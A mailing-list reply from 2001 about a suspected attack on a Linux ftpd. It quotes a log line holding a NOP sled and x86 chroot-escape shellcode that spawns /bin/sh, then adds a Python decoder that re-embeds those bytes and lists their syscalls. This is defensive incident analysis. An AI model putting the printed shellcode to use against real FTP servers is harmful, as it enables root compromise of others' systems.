Security Incidents mailing list archives

Re: Linux ftpd


From: Sam Mingolelli <sam () jake8us org>
Date: Sat, 9 Jun 2001 12:23:56 -0400

This looks like a buffer overflow attack to me. I would make sure that
you have the latest patches etc. applied to ftpd. 

You can browse through the CERT databases to see if any information has been posted
regarding this.

http://search.cert.org/query.html?rq=0&col=allcert&ht=0&qp=&qs=&qc=&pw=100%25&ws=1&la=&qm=0&st=1&nh=25&lk=1&rf=2&oq=&rq=0&si=1&qt=ftpd


* mrcbis () tin it <mrcbis () tin it> [010609 12:12]:


I have a Linux box running Slackware 7.1 with kernel 2.2.18 acting as an
office server; we have a dial-up Internet connection to an ISP near us.
Today I was looking into the log files and found the following message in
/var/log/messages:
Jun  3 21:30:05 sassuolo ftpd[24355]: ANONYMOUS FTP LOGIN FROM 202.239.131.55 [202.239.131.55],
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90>1<C0>1<DB>1<C9><B0>F<CD><80>1<C0>1<DB>C<89><D9>A<B0>?<CD><80><EB>k
^1<C0>1<C9><8D>^^A<88>F^Df<B9><FF>^A<B0>'<CD><80>1<C0><8D>^^A<B0>=<CD><80>
1<C0>1<DB><8D>^^H<89>C^B1<C9><FE><C9>1<C0><8D>^^H<B0>^L<CD><80><FE><C9>u<F3>
1<C0><88>F^I<8D>^^H<B0>=<CD><80><FE>^N<B0>0<FE><C8><88>F^D1<C0><88>F^G<89>v^H
<89>F^L<89><F3><8D>N^H<8D>V^L<B0>^K<CD><80>1<C0>1<DB><B0>^A<CD><80><E8><90><FF><FF><FF>0bin0sh1..11


repeated twice within a few minutes. I think it was an intrusion attempt. My
Linux box is connected to the Internet with a dynamic IP address. Can
someone help me?
Best regards


                                              Marco Bisio

-- 
                  \|/                                                                 
                  @-@                                                                 
------------ooO---(_)--Ooo----------------                                            
| E-Mail:                                                                             
|        (H):    slmingol () bubs f2s com                                                
|        (W):    sam.mingo () bigfoot com                                                
|                                                                                     
| web:           http://bubs.dnsq.org/~sam/
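An added example, written for this archive page and not part of either message above: a small Python decoder for the escaped form that the ftpd wrote into Marco's /var/log/messages. The escaping is reconstructed from the log line itself and is an assumption: `<XX>` is one byte as two hex digits, `^X` is a control character (byte value ord(X) - 0x40), everything else is the literal ASCII character. A literal caret (0x5E) is logged as a bare `^`, so `^^A` is ambiguous; the decoder resolves `^^X` with X in the control range as caret followed by control character, which is what the posted bytes need to form valid x86 code. The embedded sample is the shellcode transcribed from the post with the archive's line wraps removed, behind a NOP sled shortened to 64 bytes (the post shows several hundred). The syscall names come from the Linux i386 unistd.h numbering.

```python
"""Decode an escaped ftpd log payload and summarise the shellcode it carries.

Assumed escaping (reconstructed from the posted log line, not documented here):
  <XX>  - one byte given as two hex digits (the logger's form for bytes >= 0x80)
  ^X    - a control character, byte value = ord(X) - 0x40 (^A = 0x01, ^L = 0x0C)
  other - the literal ASCII character
A literal caret (0x5E, e.g. the 5E in "lea ebx,[esi+1]" = 8D 5E 01) is logged
as a bare "^", so "^^A" is ambiguous; we resolve "^^X" with X in the control
range as caret + control character, which is what the posted bytes require.
"""
import re

HEX_ESCAPE = re.compile(r"<([0-9A-Fa-f]{2})>")
CTRL_CHARS = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_"   # characters that may follow ^

# Linux/i386 syscall numbers (asm/unistd.h) that occur in this payload.
SYSCALLS = {
    0x01: "exit", 0x0B: "execve", 0x0C: "chdir", 0x27: "mkdir",
    0x3D: "chroot", 0x3F: "dup2", 0x46: "setreuid",
}

NOP = 0x90

# Constructed sample: the shellcode transcribed from the post with the archive's
# line wraps removed, behind a NOP sled shortened to 64 bytes for readability.
LOGGED_PAYLOAD = "<90>" * 64 + (
    "1<C0>1<DB>1<C9><B0>F<CD><80>1<C0>1<DB>C<89><D9>A<B0>?<CD><80><EB>k^1<C0>1"
    "<C9><8D>^^A<88>F^Df<B9><FF>^A<B0>'<CD><80>1<C0><8D>^^A<B0>=<CD><80>1<C0>1"
    "<DB><8D>^^H<89>C^B1<C9><FE><C9>1<C0><8D>^^H<B0>^L<CD><80><FE><C9>u<F3>1"
    "<C0><88>F^I<8D>^^H<B0>=<CD><80><FE>^N<B0>0<FE><C8><88>F^D1<C0><88>F^G<89>"
    "v^H<89>F^L<89><F3><8D>N^H<8D>V^L<B0>^K<CD><80>1<C0>1<DB><B0>^A<CD><80>"
    "<E8><90><FF><FF><FF>0bin0sh1..11"
)


def decode_log_escapes(text: str) -> bytes:
    """Turn the logger's escaped form back into the raw bytes the client sent."""
    out = bytearray()
    i = 0
    while i < len(text):
        m = HEX_ESCAPE.match(text, i)
        if m:
            out.append(int(m.group(1), 16))
            i = m.end()
            continue
        c = text[i]
        if c == "^" and i + 1 < len(text) and text[i + 1] in CTRL_CHARS:
            if text[i + 1] == "^" and i + 2 < len(text) and text[i + 2] in CTRL_CHARS:
                out.append(0x5E)          # literal caret; the ^X after it is handled next
                i += 1
                continue
            out.append(ord(text[i + 1]) - 0x40)
            i += 2
            continue
        out.append(ord(c))
        i += 1
    return bytes(out)


def nop_sled_length(payload: bytes) -> int:
    """Count leading 0x90 bytes: the sled that tolerates an imprecise return address."""
    n = 0
    while n < len(payload) and payload[n] == NOP:
        n += 1
    return n


def syscall_sequence(code: bytes, window: int = 8) -> list:
    """For every int 0x80 (CD 80), find the nearest preceding mov al, imm8 (B0 xx)
    within `window` bytes and report the syscall number it loads into eax."""
    calls = []
    for pos in range(len(code) - 1):
        if code[pos] == 0xCD and code[pos + 1] == 0x80:
            for back in range(pos - 2, max(pos - window, -1), -1):
                if code[back] == 0xB0:
                    calls.append(code[back + 1])
                    break
    return calls


def summarise(text: str) -> dict:
    """Decode one logged payload and describe sled, syscalls and the trailing string."""
    payload = decode_log_escapes(text)
    sled = nop_sled_length(payload)
    code = payload[sled:]
    numbers = syscall_sequence(code)
    return {
        "total_bytes": len(payload),
        "nop_sled": sled,
        "syscalls": [SYSCALLS.get(n, hex(n)) for n in numbers],
        # "0bin0sh" is patched to "/bin/sh" at run time by the dec instructions
        # preceding the execve; the '0' placeholders keep NUL and '/' out of the payload.
        "trailing_string": code[code.index(b"0bin0sh"):].decode("ascii"),
    }


if __name__ == "__main__":
    for key, value in summarise(LOGGED_PAYLOAD).items():
        print(f"{key}: {value}")
```

Run against the posted bytes, the recovered sequence is setreuid, dup2, mkdir, chroot, a chdir loop, chroot again, execve and exit: the standard chroot-escape shellcode for an anonymous FTP daemon, which bears out the reading that this was an overflow attempt against ftpd rather than a malformed login. The same decoder can be pointed at any other `<XX>`/`^X` fragment found in the log to see what else was sent.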

